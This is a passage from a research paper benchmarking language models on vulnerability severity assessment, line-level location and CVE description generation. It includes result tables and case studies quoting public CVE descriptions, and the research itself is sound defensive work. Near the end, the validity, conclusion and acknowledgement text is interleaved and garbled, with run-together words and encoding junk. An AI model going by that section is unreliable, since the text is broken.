In this RQ, we delineate two task descriptions for vulnerability assessment: (1) code-based and (2) code-based with additional key information. We compare the performance of LLMs in both task descriptions for vulnerability assessment and concurrently conduct a case study to illustrate the effectiveness of incorporating key important information.

Experimental Setting. We instruct LLMs with the following task descriptions (i.e., Task Description 1 and Task Description 2) to tell them to act as a vulnerability assessor. We first provide the LLM with the vulnerable code to explore its performance (Task Description 1). Moreover, we provide the LLM with some key important information, including the CVE description, the project, the commit message, as well as the file name where the vulnerable code exists, to investigate the performance differences (Task Description 2).

Task Description 1: Provide a qualitative severity rating of CVSS v2.0 for the vulnerable C code snippet.

Task Description 2: Provide a qualitative severity rating of CVSS v2.0 for the vulnerable C code snippet (with additional information).
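The sketch below illustrates one way the second, information-enriched prompt could be assembled. The field names mirror the key information listed above, but the exact template is an assumption, not the paper's verbatim prompt:

# Hypothetical prompt builder for Task Description 2 (code + key information).
def build_assessment_prompt(code, project=None, file_name=None,
                            cve_description=None, commit_message=None):
    parts = ["Provide a qualitative severity rating of CVSS v2.0 "
             "for the vulnerable C code snippet."]
    if project:
        parts.append(f"Project: {project}")
    if file_name:
        parts.append(f"File Name: {file_name}")
    if cve_description:
        parts.append(f"CVE Description: {cve_description}")
    if commit_message:
        parts.append(f"Commit Message: {commit_message}")
    parts.append("Code:\n" + code)
    parts.append("Severity:")
    return "\n".join(parts)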
Results. Table 8 shows the detailed results of LLMs and six baselines on vulnerability assessment. Based on these experimental results, we can observe a significant improvement in the vulnerability assessment capability of LLMs after fine-tuning. Specifically, the accuracy has increased from 0.282 to 0.424, reaching a range of 0.759 to 0.860, while precision has improved from 0.296 to 0.355, now ranging from 0.512 to 0.854. This underscores the necessity of fine-tuning in the vulnerability assessment task. Overall, fine-tuned code-related LLMs outperform pre-trained LMs in vulnerability assessment. It is worth noting that DeepSeek-Coder, after fine-tuning, achieves the best performance compared to other LLMs and pre-trained LMs. If researchers need to perform tasks such as vulnerability assessment with an LLM, fine-tuning DeepSeek-Coder is a more efficient choice. We also find that Mistral exhibits a relatively smaller improvement after fine-tuning, which aligns with our expectations, as it is a general LLM.

TABLE 8: The comparison between LLMs and six baselines on software vulnerability assessment (RQ2)

Methods | F1-score | Recall | Precision | Accuracy
CodeBERT | 0.753 | 0.730 | 0.788 | 0.828
GraphCodeBERT | 0.701 | 0.666 | 0.772 | 0.802
UniXcoder | 0.745 | 0.761 | 0.734 | 0.817
PLBART | 0.735 | 0.741 | 0.731 | 0.789
CodeT5 | 0.743 | 0.750 | 0.741 | 0.817
CodeT5+ | 0.706 | 0.677 | 0.755 | 0.789
Fine-Tuning Setting
DeepSeek-Coder 6.7B | 0.814 | 0.785 | 0.854 | 0.860
CodeLlama 7B | 0.768 | 0.749 | 0.794 | 0.827
StarCoder 7B | 0.671 | 0.677 | 0.666 | 0.764
WizardCoder 7B | 0.793 | 0.778 | 0.813 | 0.842
Mistral | 0.525 | 0.539 | 0.512 | 0.759
Phi-2 | 0.747 | 0.732 | 0.767 | 0.802
Few-Shot Setting
DeepSeek-Coder 6.7B | 0.229 | 0.339 | 0.310 | 0.262
DeepSeek-Coder 33B | 0.290 | 0.323 | 0.336 | 0.335
CodeLlama 7B | 0.310 | 0.331 | 0.334 | 0.373
CodeLlama 34B | 0.265 | 0.323 | 0.327 | 0.294
StarCoder 7B | 0.265 | 0.342 | 0.333 | 0.330
StarCoder 15.5B | 0.285 | 0.315 | 0.329 | 0.326
WizardCoder 7B | 0.244 | 0.351 | 0.336 | 0.250
WizardCoder 34B | 0.306 | 0.330 | 0.325 | 0.379
Mistral | 0.283 | 0.308 | 0.296 | 0.424
Phi-2 | 0.269 | 0.359 | 0.355 | 0.282

Finding-4. Overall, fine-tuned code-related LLMs outperform pre-trained LMs in vulnerability assessment. When resources permit, fine-tuning DeepSeek-Coder 6.7B for vulnerability assessment is optimal, as it outperforms the pre-trained LMs across four metrics.

Case Study. To illustrate the effectiveness of key important information, we present an instance of a vulnerability (CWE-119) in Big-Vul that is assessed exclusively by CodeLlama, as depicted in Table 9. This example is a vulnerability in the Linux project, categorized under CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability). In an initial assessment without critical information, CodeLlama did not fully grasp the severity of this vulnerability and labeled it as "Medium". However, with the provision of crucial details, CodeLlama can more accurately evaluate the risk level of this vulnerability. The CVE description for this vulnerability highlights multiple buffer overflows in the net/wireless/nl80211.c file of the Linux kernel prior to version 2.6.39.2. These vulnerabilities allow local users to gain elevated privileges by leveraging the CAP_NET_ADMIN capability during scan operations with an excessively long SSID value. In this scenario, the lack of proper validation of the SSID length leads to buffer overflows, enabling attackers to exploit the vulnerability, escalate privileges, and execute malicious code. The commit message describes that this bug has existed since version 2.6.29-rc4 of the Linux kernel. Given this information, CodeLlama reassesses the risk level of this vulnerability as "High". This is because it allows attackers to escalate privileges and execute malicious code, and it has persisted for a considerable period of time. It is crucial to address and patch this vulnerability promptly by updating the operating system or kernel to ensure security.

TABLE 9: A vulnerable code for CodeLlama to assess with different prompts (RQ2)

Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability (CWE-119) in Linux
Task Description 1: Provide a qualitative severity rating of CVSS v2.0 for the vulnerable C code snippet.
Input 1: An example of a C code snippet with vulnerabilities (CVE-2011-2517).
Response 1: Severity: Medium
Task Description 2: Provide a qualitative severity rating of CVSS v2.0 for the vulnerable C code snippet (with additional information).
Input 2: Project: Linux. File Name: net/wireless/nl80211.c. CVE Description: Multiple buffer overflows in net/wireless/nl80211.c in the Linux kernel before 2.6.39.2 allow local users to gain privileges by leveraging the CAP_NET_ADMIN capability during scan operations with a long SSID value. Commit Message: nl80211: fix check for valid SSID size in scan operations. In both trigger_scan and sched_scan operations, we were checking for the SSID length before assigning the value correctly. Since the memory was just kzalloc'ed, the check was always failing and SSIDs with over 32 characters were allowed to go through. This was causing a buffer overflow when copying the actual SSID to the proper place. This bug has been there since 2.6.29-rc4.
Response 2: Severity: High
Analysis: The true Severity is High. After providing additional key information, CodeLlama's output for the Severity changed from Medium to High.

To compare the vulnerability assessment capabilities of LLMs after providing key information, we have created a performance comparison bar chart, as shown in Fig. 5. LLMs have limited capacity for assessing vulnerability severity based solely on source code. However, when provided with key important information, most LLMs (i.e., DeepSeek-Coder, CodeLlama, WizardCoder, and Mistral) exhibit significantly improved vulnerability assessment capabilities, particularly in terms of the Accuracy metric. The Accuracy has increased from the range of 0.26-0.42 to the range of 0.27-0.56. StarCoder and Phi-2 show a declining trend, and we believe this may be attributed to the addition of key information, resulting in an increase in the number of input tokens. These LLMs may not excel in handling excessively long text sequences, and we analyze this further in Section 5.2. In contrast, DeepSeek-Coder and Mistral exhibit significant improvements, possibly due to their proficiency in handling long sequential text.

Fig. 5: The impact of key important information on LLM Vulnerability Assessment (RQ2) - bar charts of F1-score, Recall, Precision, and Accuracy for DeepSeek-Coder, CodeLlama, StarCoder, WizardCoder, Mistral, and Phi-2, with and without key information (wo/Info vs. wi/Info).

Finding-5. LLMs have the capacity for assessment of vulnerability severity based on source code, and can be improved by providing more context information.
4.3 RQ-3: Evaluating Vulnerability Location of LLMs

In this RQ, we first outline how to assess the vulnerability location capabilities of LLMs. Then, we proceed to compare the vulnerability location abilities of LLMs across different settings, both at a general level and in detail, and analyze the reasons behind the observed differences.

Experimental Setting. We select the vulnerable functions with information on vulnerable lines from the testing set for the evaluation and instruct LLMs with the following task description to explore their vulnerability location performance.

Task Description: Provide a vulnerability location result for the vulnerable C code snippet.

For the fine-tuning setting of LLMs and pre-trained LMs, we treat the vulnerability location task as a binary classification problem, determining whether each line of code is vulnerable or not. For the few-shot setting, a specific vulnerable function may contain one or several vulnerable lines, and the LLM may also predict one or several potential vulnerable lines (Lines_predict). We convert Lines_predict into a binary classification format. For example, if a given vulnerable function consists of five lines and contains two vulnerable lines [2, 3], and the LLM predicts one potential vulnerable line [2], we convert this prediction to the binary classification format [0, 1, 0, 0, 0] for ease of computation.
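A small sketch of this conversion, using 1-indexed line numbers consistent with the example above; this is an illustrative re-implementation, not the paper's code:

# Convert a list of predicted vulnerable line numbers (1-indexed) into a
# binary vector over all lines of the function, and back again.
def lines_to_binary(predicted_lines, num_lines):
    flagged = set(predicted_lines)
    return [1 if i in flagged else 0 for i in range(1, num_lines + 1)]

def binary_to_lines(binary):
    return [i + 1 for i, flag in enumerate(binary) if flag == 1]

assert lines_to_binary([2], 5) == [0, 1, 0, 0, 0]
assert binary_to_lines([0, 0, 0, 1, 0, 0, 0, 0, 0]) == [4]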
To better evaluate the vulnerability location performance of LLMs on a specific vulnerable function, we consider five widely used performance measures (i.e., Precision, Recall, F1-score, Accuracy, and FPR).

In addition to pre-trained LMs, we also consider the following four SOTA baselines: Devign [38], Reveal [47], IVDetect [56], and LineVul [39]. For the graph-based approaches (i.e., Devign, Reveal, and IVDetect), we use GNNExplainer [78], [79] for vulnerability location. We compare the performance of LLMs and these baselines using Top-k Accuracy, as employed in previous works [39], [79].
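For reference, Top-k Accuracy in this setting is typically computed as the fraction of vulnerable functions for which at least one truly vulnerable line appears among the k highest-scored lines. The sketch below is our formulation for illustration, not necessarily the exact one used by the baselines:

# Hypothetical Top-k Accuracy: a function counts as a "hit" if any
# ground-truth vulnerable line is ranked within the top-k lines by score.
def top_k_accuracy(samples, k):
    hits = 0
    for line_scores, true_lines in samples:  # per-line scores, 1-indexed truths
        ranked = sorted(range(1, len(line_scores) + 1),
                        key=lambda i: line_scores[i - 1], reverse=True)
        if set(ranked[:k]) & set(true_lines):
            hits += 1
    return hits / len(samples) if samples else 0.0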
Results. Table 10 presents the overall performance of vulnerability location between LLMs and seven baselines. Based on this table, we can achieve the following observations: (1) Fine-tuning can greatly enhance the vulnerability location capabilities of LLMs. For example, after fine-tuning, CodeLlama 7B's F1-score increases from 0.082 to 0.504, recall increases from 0.063 to 0.396, precision increases from 0.116 to 0.691, accuracy increases from 0.882 to 0.919, and FPR decreases from 0.043 to 0.021. (2) Code-related LLMs often outperform pre-trained LMs in terms of F1-score, precision, and FPR. For example, CodeLlama 7B outperforms the pre-trained LMs, which are averaged over six different models, by 14.3%, 31.9%, and 54.3% in terms of F1-score, precision, and FPR, respectively.

TABLE 10: The comparison between LLMs and six baselines on software vulnerability location (RQ3)

Methods | F1-score | Recall | Precision | Accuracy | FPR
CodeBERT | 0.470 | 0.514 | 0.433 | 0.879 | 0.078
GraphCodeBERT | 0.483 | 0.477 | 0.489 | 0.893 | 0.058
UniXcoder | 0.460 | 0.384 | 0.575 | 0.908 | 0.032
PLBART | 0.436 | 0.416 | 0.458 | 0.886 | 0.058
CodeT5 | 0.493 | 0.408 | 0.623 | 0.914 | 0.028
CodeT5+ | 0.303 | 0.207 | 0.565 | 0.902 | 0.018
Fine-Tuning Setting
DeepSeek-Coder 6.7B | 0.437 | 0.332 | 0.640 | 0.912 | 0.021
CodeLlama 7B | 0.504 | 0.396 | 0.691 | 0.919 | 0.021
StarCoder 7B | 0.245 | 0.169 | 0.443 | 0.893 | 0.024
WizardCoder 7B | 0.520 | 0.427 | 0.664 | 0.918 | 0.025
Mistral | 0.314 | 0.384 | 0.266 | 0.827 | 0.122
Phi-2 | 0.458 | 0.361 | 0.629 | 0.912 | 0.025
Few-Shot Setting
DeepSeek-Coder 6.7B | 0.111 | 0.111 | 0.112 | 0.852 | 0.081
DeepSeek-Coder 33B | 0.110 | 0.112 | 0.108 | 0.849 | 0.084
CodeLlama 7B | 0.082 | 0.063 | 0.116 | 0.882 | 0.043
CodeLlama 34B | 0.115 | 0.090 | 0.158 | 0.884 | 0.044
StarCoder 7B | 0.088 | 0.066 | 0.134 | 0.887 | 0.039
StarCoder 15.5B | 0.095 | 0.078 | 0.120 | 0.876 | 0.052
WizardCoder 7B | 0.082 | 0.063 | 0.120 | 0.884 | 0.042
WizardCoder 34B | 0.096 | 0.072 | 0.145 | 0.887 | 0.039
Mistral | 0.086 | 0.065 | 0.127 | 0.885 | 0.040
Phi-2 | 0.073 | 0.053 | 0.116 | 0.885 | 0.037

The Top-k Accuracy results of the interpreters are shown in Fig. 6, where the x-axis represents k and the y-axis represents Top-k Accuracy (%). For comparison, we average the results of all LLMs and pre-trained LMs. We can observe that the performance of these graph-based methods does not show significant differences but is considerably weaker than that of pre-trained LMs, LLMs, and LineVul. Although pre-trained LMs achieve the highest accuracy at k=20, the difference between them and LLMs is not substantial.

Fig. 6: The interpretation results for different vulnerability locators with k from 2 to 20 (RQ3) - Top-k Accuracy curves for LLMs, LMs, Devign, IVDetect, Reveal, and LineVul.

Case Study. We find that LLMs under the few-shot setting have limitations, and in some exceptional cases, they tend to output more vulnerable lines, even if these lines do not contain vulnerabilities. Taking StarCoder as an example, Fig. 7 depicts a vulnerable code snippet from the Big-Vul dataset, with the vulnerable behavior occurring in lines 3 and 4. However, StarCoder tends to output more vulnerable lines, such as "[1, 2, 3, 4, 5, 6, 7, 8, 9]", whereas after fine-tuning, StarCoder becomes more cautious and only predicts "[4]". Note that we convert the model's predictions into a specific format, i.e., transform "[0, 0, 0, 1, 0, 0, 0, 0, 0]" to "[4]".

Task Description: Provide a vulnerability location result for the vulnerable C code snippet.
StarCoder: [1, 2, 3, 4, 5, 6, 7, 8, 9]
StarCoder (Fine-Tuning): [4]

01 standard_info_part2(standard_display *dp, ..., int nImages)
02 {
03   dp->pixel_size = bit_size(pp, ..., png_get_bit_depth(pp, pi));
04   dp->bit_width = png_get_image_width(pp, pi) * dp->pixel_size;
05   dp->cbRow = png_get_rowbytes(pp, pi);
06   if (dp->cbRow != (dp->bit_width+7)/8)
07     png_error(pp, "bad png_get_rowbytes calculation");
08   store_ensure_image(dp->ps, pp, nImages, dp->cbRow, dp->h);
09 }

Fig. 7: An example to demonstrate the limitations of StarCoder in vulnerability location (RQ3)

Finding-6. The few-shot setting exposes LLMs' limitations, and fine-tuning can greatly enhance the vulnerability location capabilities of LLMs.

Finding-7. Fine-tuning code-related LLMs as vulnerability locators is beneficial, as they can outperform pre-trained LMs in terms of F1-score, precision, and FPR.
4.4 RQ-4: Evaluating Vulnerability Description of LLMs

In this RQ, we employ the ROUGE metric to evaluate the LLMs' vulnerability description capabilities. We conduct a detailed statistical analysis of LLMs' abilities and also perform a case study to provide a comprehensive assessment of their performance in describing vulnerabilities.

Experimental Setting. We instruct LLMs with a designated task description, guiding them to perform the role of a vulnerability descriptor. Table 11 illustrates an example of our approach to evaluating LLMs' proficiency in conducting vulnerability descriptions.

Task Description: Provide a CVE description for the vulnerable C code snippet.

TABLE 11: An example of generating a vulnerability description for vulnerable code (RQ4)

Describe vulnerable code (CWE-119, Improper Restriction of Operations within the Bounds of a Memory Buffer)
Task Description: Provide a CVE description for the vulnerable C code snippet.
Source Code: An example of a C code snippet with vulnerabilities. CVE ID: CVE-2016-0841.
Response From CodeT5+: libmedia in mediaserver in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-08-01 has certain incorrect declarations, which allows remote attackers to execute arbitrary code or cause a denial of service (NULL pointer dereference or memory corruption) via a crafted media file, aka internal bug 28166152.
Response From CodeLlama: media/libmedia/MediaMetadataRetriever.cpp in mediaserver in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 does not validate the data size, which allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted media file, aka internal bug 28799341. Specifically, the constructor calls the native function createMetadataRetriever in libstagefright, and later calls the getFrameAtTime function, aka internal bug 29244311. The getFrameAtTime call triggers a memory corruption warning, which allows an attacker to execute arbitrary code via a crafted video file, aka internal...
CVE Description: media/libmedia/mediametadataretriever.cpp in mediaserver in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 mishandles cleared service binders, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted media file, aka internal bug 26040840.

To evaluate the precision of the generated CVE descriptions, we adopt the widely used performance metric ROUGE [80], which is a set of metrics used for evaluating automatic summarization and machine translation software in natural language processing. The metrics compare an automatically produced summary or translation against a reference or a set of (human-produced) reference summaries or translations. Here, we consider three settings in total: ROUGE-1, ROUGE-2, and ROUGE-L.
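One widely used Python implementation of these three settings is the rouge-score package; a minimal sketch follows (illustrative, not necessarily the exact scorer configuration used here):

# Score a generated CVE description against the reference with ROUGE-1/2/L.
from rouge_score import rouge_scorer

scorer = rouge_scorer.RougeScorer(["rouge1", "rouge2", "rougeL"],
                                  use_stemmer=True)

def rouge_f1(reference: str, candidate: str) -> dict:
    scores = scorer.score(reference, candidate)
    return {name: round(s.fmeasure, 3) for name, s in scores.items()}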
Results. Table 12 presents the vulnerability description capabilities of LLMs and six baselines. According to the results, we can obtain the following observations: (1) LLMs exhibit significantly weaker performance in generating vulnerability descriptions compared to pre-trained LMs. For instance, pre-trained LMs achieve an average performance of 0.600, 0.487, and 0.591 on ROUGE-1, ROUGE-2, and ROUGE-L, respectively, whereas fine-tuned LLMs only achieve an average of 0.406, 0.301, and 0.400 on the same metrics. (2) Fine-tuning can significantly enhance the performance of LLMs in vulnerability descriptions. After fine-tuning, there is a several-fold improvement in ROUGE-1, ROUGE-2, and ROUGE-L. This suggests that these LLMs possess strong learning capabilities and can extract more gains from historical data. (3) The low ROUGE-2 scores indicate that Phi-2 has a limited ability to generate accurate and relevant high-order n-grams (pairs of consecutive words) in vulnerability descriptions, indicating potential issues in capturing specific and detailed information.

TABLE 12: The comparison of LLMs on software vulnerability description (RQ4)

Methods | ROUGE-1 | ROUGE-2 | ROUGE-L
CodeBERT | 0.511 | 0.376 | 0.501
GraphCodeBERT | 0.538 | 0.406 | 0.528
UniXcoder | 0.658 | 0.558 | 0.650
PLBART | 0.447 | 0.313 | 0.437
CodeT5 | 0.700 | 0.604 | 0.693
CodeT5+ | 0.747 | 0.668 | 0.740
Fine-Tuning Setting
DeepSeek-Coder 6.7B | 0.434 | 0.325 | 0.425
CodeLlama 7B | 0.392 | 0.292 | 0.387
StarCoder 7B | 0.420 | 0.321 | 0.416
WizardCoder 7B | 0.425 | 0.327 | 0.419
Mistral | 0.453 | 0.347 | 0.448
Phi-2 | 0.313 | 0.196 | 0.305
Few-Shot Setting
DeepSeek-Coder 6.7B | 0.230 | 0.073 | 0.215
DeepSeek-Coder 33B | 0.219 | 0.066 | 0.203
CodeLlama 7B | 0.221 | 0.070 | 0.205
CodeLlama 34B | 0.258 | 0.094 | 0.242
StarCoder 7B | 0.243 | 0.084 | 0.229
StarCoder 15.5B | 0.255 | 0.089 | 0.241
WizardCoder 7B | 0.230 | 0.066 | 0.211
WizardCoder 34B | 0.276 | 0.111 | 0.261
Mistral | 0.290 | 0.095 | 0.267
Phi-2 | 0.210 | 0.056 | 0.194

Case Study. To demonstrate the capability of pre-trained LMs and LLMs in generating vulnerability descriptions, we present an example of a vulnerability (CWE-119) described by CodeT5+ and CodeLlama, as shown in Table 11. This example represents a vulnerability within the Android project, categorized as CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability). It is noteworthy that even when provided with only the code of the vulnerability, CodeT5+ produces text highly similar to the CVE description, indicating that pre-trained LMs are capable of comprehending the essence and crucial features of vulnerabilities and expressing this information in natural language.

Additionally, we find that CodeLlama's response is very similar to the CVE description, but with many additional details. We hypothesize that the poor performance of LLMs is not due to their inability to generate appropriate vulnerability descriptions, but rather because they tend to output tokens endlessly, even when they should stop. In contrast, pre-trained LMs typically stop at the appropriate points.

To further analyze this, we investigate the vulnerability description capabilities of LLMs after mitigating this issue. Using CodeLlama as an example, we randomly select 100 examples from the testing set and manually determine where the descriptions should terminate, trimming CodeLlama's output accordingly. We then calculate the ROUGE metrics for the trimmed outputs and compare them with the original results and those of CodeT5+. The final results are presented in Table 13; we find that after trimming, the ROUGE-1, ROUGE-2, and ROUGE-L scores for CodeLlama significantly improved, even nearing those of CodeT5+. This confirms our hypothesis that LLMs actually possess strong vulnerability description capabilities, but their performance is hindered by the tendency to output excessively.

TABLE 13: The comparison of CodeT5+, CodeLlama, and CodeLlama-Trim on selected examples (RQ4)

Methods | ROUGE-1 | ROUGE-2 | ROUGE-L
CodeT5+ | 0.730 | 0.644 | 0.722
CodeLlama | 0.366 | 0.266 | 0.360
CodeLlama-Trim | 0.625 | 0.523 | 0.616
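The trimming in this study was done manually; a simple automatic approximation would cut the generation at the first natural stopping point. The heuristic below (stopping at the first blank line or after the first "aka internal bug ..." clause, which closes the CVE descriptions in this dataset) is our illustrative assumption, not the paper's procedure:

# Hypothetical heuristic trimming of an LLM-generated CVE description.
import re

def trim_description(text: str) -> str:
    text = text.split("\n\n", 1)[0]                 # stop at first blank line
    m = re.search(r"aka internal bug \d+\.", text)  # stop after first bug clause
    return text[: m.end()] if m else text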
Finding-8. LLMs exhibit significantly weaker performance in generating vulnerability descriptions compared to pre-trained LMs. Therefore, fine-tuning pre-trained LMs for vulnerability description is recommended.

5 DISCUSSION

This section discusses open questions regarding the performance differences observed, the impact of input sequence length, and potential threats to the validity of our results.

5.1 Analysis of Performance Difference

In RQ1, for LineVul, there is a huge difference between the results obtained in this paper (i.e., 0.272 of F1-score) and the ones reported in the original work (i.e., 0.910 of F1-score). To ensure a fair comparison, we first check the correctness of our LineVul reproduction by re-conducting the corresponding experiments using the original dataset provided by LineVul's official source, and we obtain similar results. Then, we inspect each step of the data preprocessing process, as outlined in Section 3.1. In particular, this process involves three pre-processing steps in total: removing blank lines, removing comments, and trimming leading and trailing spaces from lines. We pre-process the original dataset of LineVul, re-train, and test the model under the same parameter settings. The results are shown in Table 14, and we obtain the following conclusions:

• Our reproduced LineVul performs closely to the original one.
• Removing blank lines and comments does not significantly affect LineVul's results.
• Trimming leading and trailing spaces from lines causes a drastic decrease in LineVul's performance.

Generally, for C/C++ source code, we know that removing leading and trailing spaces does not affect the code's semantics. Thus, to verify whether this observation generalizes to other transformer-based models, we conduct another experiment on UniXcoder (another famous and widely used transformer-based pre-trained model) by adopting the same filtering operations. The results are presented in the right part of Table 14. Table 14 shows that UniXcoder's performance closely resembles LineVul's before the third step of processing. However, after pre-processing, UniXcoder's performance similarly plummeted. Thus, we believe that such types of operations will have side impacts on transformer-based models, since these methods pay attention to each token, even though these tokens have no semantic meaning in the context of source code. Based on this observation, we believe that the vulnerability detection effectiveness of LineVul after space removal is correct and the performance results are reasonable.

TABLE 14: The reproduced results for LineVul and UniXcoder

LineVul:
Datasets | F1-score | Accuracy | Recall | Precision
Original dataset | 0.90 | 0.95 | 0.86 | 0.95
Remove empty lines | 0.85 | 0.98 | 0.79 | 0.93
Remove comments | 0.86 | 0.99 | 0.81 | 0.93
Remove spaces | 0.40 | 0.94 | 0.37 | 0.45

UniXcoder:
Datasets | F1-score | Accuracy | Recall | Precision
Original dataset | 0.86 | 0.98 | 0.82 | 0.90
Remove empty lines | 0.85 | 0.98 | 0.82 | 0.88
Remove comments | 0.85 | 0.98 | 0.81 | 0.90
Remove spaces | 0.26 | 0.95 | 0.16 | 0.68
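The three preprocessing steps studied in Table 14 can be reproduced with a few lines of Python. This sketch uses simple regular expressions for C/C++ comments and is an approximation of the pipeline described above, not the original implementation (regex-based comment stripping can misfire on comment-like string literals):

# Approximate re-implementation of the three preprocessing steps:
# remove blank lines, remove C/C++ comments, trim leading/trailing spaces.
import re

def remove_comments(code: str) -> str:
    code = re.sub(r"/\*.*?\*/", "", code, flags=re.DOTALL)  # block comments
    return re.sub(r"//[^\n]*", "", code)                    # line comments

def preprocess(code: str) -> str:
    code = remove_comments(code)
    lines = [ln.strip() for ln in code.splitlines()]        # trim spaces
    return "\n".join(ln for ln in lines if ln)              # drop blank lines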
5.2 Analysis of Input Sequence Length

In RQ2, we find that after adding key information, the performance of StarCoder and Phi-2 in vulnerability assessment actually weakened. We hypothesize that these LLMs may not excel in handling excessively long text sequences. Therefore, adding key information, which results in an increase in the number of input tokens, leads to a decline in performance. In this section, we aim to analyze the performance of StarCoder and Phi-2 with respect to input sequence length to determine whether there is a performance decline as the input length increases. As shown in Fig. 8, the horizontal axis represents the token length of the input sequence, and the vertical axis represents the F1-score of vulnerability assessment. We categorize the input token lengths into 0-128, 128-256, 256-512, 512-1024, and 1024+ (e.g., an input token length of 64 falls into the 0-128 range), and evaluate the vulnerability assessment performance of StarCoder and Phi-2 for each category. According to Fig. 8, we observe that as the input length increases, the F1-scores of both LLMs gradually decrease, revealing their significant limitations in assessing long sequences of vulnerable code. Therefore, in practical applications requiring the assessment of long sequences of vulnerable code, we may need to consider alternative optimization strategies or model choices to ensure accuracy and reliability.

Fig. 8: The variation of F1-scores for vulnerability assessment with respect to input sequence length (StarCoder and Phi-2).
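The bucketing used in this analysis can be expressed compactly; the sample format and the scoring choice below are assumptions for illustration:

# Hypothetical length-bucket analysis: group samples by input token length
# and report the F1-score per bucket.
from collections import defaultdict
from sklearn.metrics import f1_score

BUCKETS = [(0, 128), (128, 256), (256, 512), (512, 1024), (1024, float("inf"))]

def bucket_of(n_tokens: int) -> str:
    for lo, hi in BUCKETS:
        if lo <= n_tokens < hi:
            return f"{lo}+" if hi == float("inf") else f"{lo}-{int(hi)}"
    return "unknown"

def f1_by_bucket(samples):  # samples: (n_tokens, y_true, y_pred) triples
    grouped = defaultdict(lambda: ([], []))
    for n, yt, yp in samples:
        ys_true, ys_pred = grouped[bucket_of(n)]
        ys_true.append(yt)
        ys_pred.append(yp)
    return {b: f1_score(yt, yp, average="macro")
            for b, (yt, yp) in grouped.items()}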
Threats to Construct Validity mainly correspond to the performance metrics in our evaluations. To minimize such threats,weconsiderafewwidelyusedperformancemetrics to evaluate the performance of LLMs on different types of tasks,e.g.,Recall,Precision,andROUGE.  6WDU&RGHU 6 CONCLUSION   3KL This paper aims to comprehensively investigate the capa-    bilities of LLMs for software vulnerability tasks as well as  its impacts. To achieve that, we adopt a large-scale vulner- ability dataset (named Big-Vul) and then conduct several experimentsfocusingonfourdimensions:(1)Vulnerability Detection, (2) Vulnerability Assessment, (3) Vulnerabil- ity Location, and (4) Vulnerability Description. Overall, although LLMs show some ability in certain areas, they still need further improvement to be competent in soft- ware vulnerability-related tasks. Our research conducts a comprehensive survey of LLMs’ capabilities and provides a reference for enhancing its understanding of software vulnerabilitiesinthefuture. Fig. 8: The variation of F1-scores for vulnerability assess- mentwithrespecttoinputsequencelength ACKNOWLEDGEMENTS 5.3 ThreatstoValidity This work was supported by the National Natural Sci- Threats to Internal Validity mainly contains in two-folds. ence Foundation of China (Grant No.62202419 and No. The first one is the design of a prompt to instruct LLMs 62172214), the Ningbo Natural Science Foundation (No. to give out responses. We design our prompt according to 2022J184),andtheKeyResearchandDevelopmentProgram the practical advice [77] which has been verified by many ofZhejiangProvince(No.2021C01105).15 REFERENCES [23] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez,Ł.Kaiser,andI.Polosukhin,“Attentionisallyouneed,”
[1] T. Brown, B. Mann, N. Ryder, M. Subbiah, J. D. Kaplan, P. Dhariwal, A. Neelakantan, P. Shyam, G. Sastry, A. Askell et al., "Language models are few-shot learners," Advances in Neural Information Processing Systems, vol. 33, pp. 1877-1901, 2020.
[2] A. Radford, K. Narasimhan, T. Salimans, I. Sutskever et al., "Improving language understanding by generative pre-training," 2018.
[3] P. Liu, W. Yuan, J. Fu, Z. Jiang, H. Hayashi, and G. Neubig, "Pre-train, prompt, and predict: A systematic survey of prompting methods in natural language processing," ACM Computing Surveys, vol. 55, no. 9, pp. 1-35, 2023.
[4] R. Tang, Y.-N. Chuang, and X. Hu, "The science of detecting llm-generated texts," arXiv preprint arXiv:2303.07205, 2023.
[5] E. Nijkamp, B. Pang, H. Hayashi, L. Tu, H. Wang, Y. Zhou, S. Savarese, and C. Xiong, "Codegen: An open large language model for code with multi-turn program synthesis," arXiv preprint arXiv:2203.13474, 2022.
[6] Q. Zheng, X. Xia, X. Zou, Y. Dong, S. Wang, Y. Xue, Z. Wang, L. Shen, A. Wang, Y. Li et al., "Codegeex: A pre-trained model for code generation with multilingual evaluations on humaneval-x," arXiv preprint arXiv:2303.17568, 2023.
[7] Y. Wang, W. Wang, S. Joty, and S. C. Hoi, "Codet5: Identifier-aware unified pre-trained encoder-decoder models for code understanding and generation," arXiv preprint arXiv:2109.00859, 2021.
[8] Y. Wang, H. Le, A. D. Gotmare, N. D. Bui, J. Li, and S. C. Hoi, "Codet5+: Open code large language models for code understanding and generation," arXiv preprint arXiv:2305.07922, 2023.
[9] DeepSeek AI, "Deepseek coder: Let the code write itself," https://github.com/deepseek-ai/DeepSeek-Coder, 2023.
[10] R. Li, L. B. Allal, Y. Zi, N. Muennighoff, D. Kocetkov, C. Mou, M. Marone, C. Akiki, J. Li, J. Chim et al., "Starcoder: may the source be with you!" arXiv preprint arXiv:2305.06161, 2023.
[11] B. Rozière, J. Gehring, F. Gloeckle, S. Sootla, I. Gat, X. E. Tan, Y. Adi, J. Liu, T. Remez, J. Rapin et al., "Code llama: Open foundation models for code," arXiv preprint arXiv:2308.12950, 2023.
[12] C. S. Xia, Y. Wei, and L. Zhang, "Automated program repair in the era of large pre-trained language models," in Proceedings of the 45th International Conference on Software Engineering (ICSE 2023). Association for Computing Machinery, 2023.
[13] C. S. Xia and L. Zhang, "Keep the conversation going: Fixing 162 out of 337 bugs for $0.42 each using chatgpt," arXiv preprint arXiv:2304.00385, 2023.
[14] C. S. Xia and L. Zhang, "Less training, more repairing please: revisiting automated program repair via zero-shot learning," in Proceedings of the 30th ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering, 2022, pp. 959-971.
